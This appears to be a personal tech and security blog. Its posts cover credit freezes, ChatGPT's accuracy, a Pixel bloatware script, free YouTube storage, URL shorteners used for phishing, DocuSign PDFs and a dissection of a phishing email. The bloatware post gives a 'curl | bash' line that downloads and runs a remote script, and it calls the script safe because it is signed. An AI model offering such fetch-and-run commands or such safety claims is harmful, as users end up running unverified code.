By Mail: TransUnion LLC, P.O. Box 2000 Chester, PA 19016
Online Account:
Terminology: Credit Lock
How To Lock: Dashboard has Lock/unlock button
Direct URL: N/A

INNOVIS:

Online: https://www.innovis.com/securityFreeze
By Phone: 866-712-4546
Online Account:
N/A

Final Note: The information above is designed to be simple and easy to follow, so that anyone can place a credit freeze quickly and easily. Permanently freezing your credit reports is sufficient in protecting yourself from identity theft. However, I did encounter a more complex process outlined on Reddit (link below) that focuses on all the steps to take if you were indeed an identity theft victim. Some of the steps mentioned there are very extreme and complex, but I suppose overprotecting yourself isn't bad, especially when it comes to your identity.

https://www.reddit.com/r/IdentityTheft/comments/uvv3ij/psa_freezing_your_three_main_credit_reports_is/

Saturday, March 18, 2023

ChatGPT vs. Google search

Whether you're looking for the latest news, a specific product, or a how-to guide, Google search can help you find what you need in a matter of seconds. We all use google search every day at least once or some people like me use multiple times a day. 

Ever since ChatGPT came along, I find myself going there in the hope that I will find what I am looking for faster and easier using the conversational search approach. However, I often find myself falling back to Google search because 4 out of 5 times ChatGPT gives me wrong information and directing me in the wrong path (see the screenshot at end). At this point, I am convinced that it is actually faster for me to go to Google search in the first place for accurate information. Granted my search needs are highly technical in nature and I understand that is not exactly same for everyone but still I think Google search is faster, and most importantly accurate, at least for now.


What do you think?


Just for fun, I asked ChatGPT the question and here is the response I got.

When it comes to finding specific information quickly, Google search is still the go-to tool for most people. However, if you want a more conversational and personalized response to your query, ChatGPT can be a great option.

Here is a screenshot of one of the flat-out wrong answer from ChatGPT for one of my search/question with high degree of confidence 😆



Tuesday, March 14, 2023

Bloatware in Pixel?

I only buy Google Pixel phones to avoid carrier & phone manufacturer installed, un-removable bloatware but little that I know these bloat kings like Samsung, Verizon, AT&T, etc managed to shove their crap on my Pixel phone and I have no clue how they managed to do that. I accidentally discovered some and believe it or not, you can't remove it without ‘root’ing your phone which will disable monthly security patches. Long story short, I wrote a script to disable them from running. 

Feel free to use this script but you need to have android adb installed on your computer and connected your phone with USB cable in order for this script to work.

https://github.com/aselvan/scripts/blob/master/andriod/remove_bloatware.sh

If your phone is not pixel, you will find crap ton of bloatware. If you give me the full list (i.e., run my script '-a' option), I can update the bloatware list in the script so you can remove them. Right now, the list I have hardcoded in this script only includes what I found on my pixel which are listed below.

Finally, here is a quiz to see if anyone can answer this question (post your answer as comment). So you found a strange package called ‘org.thoughtcrime.securesms’ installed in your phone i.e. run my script with argument  ‘-p org.thoughtcrime.securesms’ that checks your phone to see if you have it. Do you think it is a malware? 😜

PS: all the scripts I post on my GitHub repo are digitally signed by me so they are as safe as it can be to run and if you feel brave you can run directly in a bash shell (MacOS or Linux) like so below.

curl -s https://raw.githubusercontent.com/aselvan/scripts/master/andriod/remove_bloatware.sh | bash -s -- -h


Tuesday, March 7, 2023

Free Cloud storage

Yeah, you read it correct, free 😁. We all know the phrase “there ain't no such thing as a free lunch” but there is a way to store all your family vacation pictures, videos for free with a minor caveat.

All of us have ton of vacation pictures, videos and such lying around on our computer, phone, USB stick, camera SD card etc. While it is always a good practice to backup your precious memories to external hard drive, but it is still not good enough. Hard drive is not permanent storage as it can fail anytime. What would you do if all your precious memories went down with your backup drive? While cloud storage does address this problem, it does cost money. What if I told you that you can store your stuff on cloud for free? Read on if interested …

Videos:
First, let’s start w/ video files as its pretty easy. I am sure many of you used YouTube to upload your videos to share w/ your family & friends or even to public in some cases. Did you know that you can also upload all your personal videos there as well and mark it as “private” (see screenshot below) so it's visible only to you? 


That is right, you can upload literally everything you have in video format to YouTube. As of now, Google does not charge anything for storage, and it’s been that way for years, but that may change down the road but for now it is absolutely free. While YouTube runs super aggressive compression algorithm to maximize space, it does not impose any limit on length or size of files you can upload, and the loss of quality is not noticeable at all. I just uploaded a really huge video file (15 GB) and google is cool w/ that. If you don’t know how to upload files to YouTube, follow these simple steps. While logged in with your Gmail/Google account, head over to https://studio.youtube.com/ select Dashboard/Upload Videos and drag/drop your videos as much as your heart's content. Before you do that, you need to go to “Settings”/”Upload defaults” to set visibility to “Private”. There you have it.

Pictures:
Obviously, video is easy but how do you upload pictures since YouTube only accepts video? Well, you could generate a video of your pictures may be one video for each vacation or event and upload as videos. This is the minor caveat I mentioned earlier, i.e., you have to do some work to convert your pictures to video which is not that hard. To make it easy, I wrote a script to do just that on MacOS, or any Linux, or ChromeOS based computers. Windows users can run the script under WSL (Windows Subsystem for Linux) on Windows 10/11. If you are like me who always create slideshows with vacation pictures anyways, converting to video is not a bad option at all. The script to convert picture to video is available at my GitHub repo at link below.


It is pretty simple to run the script. First, copy all your pictures of a specific event or vacation trip to a directory and run this script on that directory as shown below. You can specify a title to use with the -t option and use any MP3 for background audio. The generated output video will be in the same directory. Now you can upload the video to YouTube!















To make bulk creation easy, I wrote another script that reads a CSV file where you can define where your files are and what title, background to use and run at one shot to create videos of all of your files as long as they are in separate directory. See script below.


Finally, if you have any questions on the options for generating video, feel free to ask. Enjoy!

For completeness, I want to mention there is a very complex method available to literally store any of your files, including documents, zip file etc on YouTube for free. Which of course requires lot more technical knowledge/skills that is way beyond the scope of this blog. If interested, you can read about it here https://hackaday.com/2023/02/21/youtube-as-infinite-file-storage/ and here https://gizmodo.com/backup-data-on-youtube-hack-white-noise-aka-isg-1850261527 . Keep in mind these are not reliable methods as one tweak in compression algorithm will render your data unreadable and useless so I would not use these methods to store anything important.




Friday, March 3, 2023

Phishing scams using URL Shorteners

I am sure many of you are familiar with shortened URLs that redirect you to a different long-winded URL when clicked. If you’ve ever seen or used tinyurl.com, or a bit.ly link, you are already familiar with how they work. 

These shorturl services like bit.ly etc., have been abused by scammers for their phishing campaign for a while now. Recently, there is an increased use of these technique specifically leveraging reputable/legitimate websites like linkedin.com (see link below) since malware protection software and spam blockers are unlikely to block these short links created by reputable organizations like LinkedIn.

https://www.malwarebytes.com/blog/news/2023/02/linkedin-slinks-abused-to-phish-email-and-payment-details

So how do you know if your given short URL is not going to take you to a shady phishing site or worse, to a malware laced website? Essentially, what you need is an inverse of shorturl i.e., longurl 😁 which expands the shorturl to show where it would take you if you were to click. That is exactly what I have done on this simple tool below. Feel free to use.

https://selvansoft.com/longurl/

Note: Try expanding this sample short link (https://bit.ly/3YuGbTA) using the longurl service above. For safety, the redirect address is checked w/ out actually traversing there and also it goes just one level deep only. There is also urlscan.io that does lot more if you want to try that as well. 

PS: I also have a very simple shorturl service similar to bit.ly here  https://selvansoft.com/shorturl/ Again, feel free to use.

Thursday, January 26, 2023

DocuSign sends sensitive info in plain text

Yes, you read the title correctly. DocuSign indeed sends everything including sensitive information to you after you complete "docusigning" something.

Have you ever used the DocuSign service for signing any documents? I am sure many of you are familiar with DocuSign because it is used very widely everywhere for document signing online. If you think you haven't used it, think again, you may have used it and not know about it. Typically, a lot of information you enter when you sign any legal document like your loan application, lease contract, loan, even job acceptance these days goes via DocuSign. When both parties completed the signing process, DocuSign will send you a mail with a copy of the fully signed/executed document (PDF file) once. The PDF file may likely contain your SSN, DOB, address, phone number, account number and many other sensitive information you may have entered during the signing process. Guess what, all of these are in "plain" form and sitting in your email (gmail, yahoo etc). If you don't believe me, search your email from docusign.net and open the attachment they sent you. You would not believe what you see.

If you use gmail (who doesn't?) here is a easy search filter to quickly show all mails from docusign containing PDF files. 

"from:(docusign.net|docusign.com) has:attachment filename:pdf"

The screenshot below will help if you don't know how to search for e-mail messages with filter. 



How to spot phishing attempt - an anatomy of a phishing Email

Note: This is an old post from 2014 at blog.selvans.net. It is moved to this site as part of migration. Though it is more than 8 years old, it is still valid and relevant.

If you consider yourself as someone who knows how to spot spam and phishing emails, you won't learn anything new here. Others who want to learn how to spot spam or phishing mails, especially if you are someone who simply can't resist clicking on links in your email no matter how many times you were told not to :)  read on …

Like most of you, every now and then I do get a phishing mail delivered to my inbox. Gmail usually does a pretty good job of filtering spam and phishing mails, however, this particular one shown here slipped through gmail spam filter because of my own filter (a discussion on why it slipped is outside the scope of this blog). Anyway, here is a screenshot of the phishing mail we will be dissecting in this blog. Apparently, citibank all of a sudden lost everything they know about me except my email address :). You can stop right here since it is clearly a phishing attempt, but for the purpose of this exercise, lets continue. At a glance, for a novice email user, it looks legitimate and it does appear to have come from citibank.com, and is instructing me to download the attachment called Citibank.html. It must be important since it is from citibank alert service and I should immediately download the file and double click it right? The first thing you need to understand is that the 'mail from' (i.e. in this case alerts@citibank.com) is the easiest thing to fake. To find out where it really came from you need to see the full email headers from the “show original” option. [Note: The screen shot below is from gmail but as far as I know all mail clients like yahoo, hotmail, outlook etc allow you to view the 'raw' content of the mail which will show all mail headers].



When you select the 'show original' as shown above, you can get the 'raw' mail content including all the mail headers (see annotated screenshot below).



From the above screenshot, you can clearly see google's mail server received this mail from decisiontreetech.com not from citibank.com (highlighted in yellow). Does this mean the decisiontreetech.com is the phishing source? The answer is No. In this case, it looks like someone from that company seem to be infected with a malware allowing a remote hacker to hijack their email account session to send phishing mail via that company's mail server. If you look further down you can see a remote host from France with a IP address 62.244.93.88 initiated this message. For many of you, unless you are in cyber crime division of law enforcement, at this point, it doesn't matter who the criminal is (we will discover shortly below), you know this is fake and you should simply delete this mail and go on with your life. You can continue to read if you are interested in dissecting this mail further ...

Now, we are going to examine the attachment the crook wants you to download so he can collect your information. Typically, you can view the raw mail safely with your browser to see what the attachment contains to make sense out of it as long as its not binary. In this case it is supposed to be a HTML file. However, the crook encoded the content of the HTML text to base64 encoding so it is not easy to view what he is trying to do and where he intend to send your information (see the screen shot below).


I can just download the file to let the browser decode the base64 encoded HTML for me or just simply copy the content and decode it myself. The following screen shot is a relevant part of the HTML file decoded using an online decode tool from www.base64decode.org



Finally, you can see they are posting your information to a webserver at 69.73.182.242 to eventually mail everything to two email address i.e. sammy78@iname.com and effeferegregregre@yahoo.com There you have it.

PS: As of this writing the above server is still up and running although the post action is no longer working.

Hope this blog helped you to learn how to easily spot phishing mails and protect your hard earned money. Bottom-line is, if you get a mail asking for stuff your financial institution should already know, its a fake, delete it.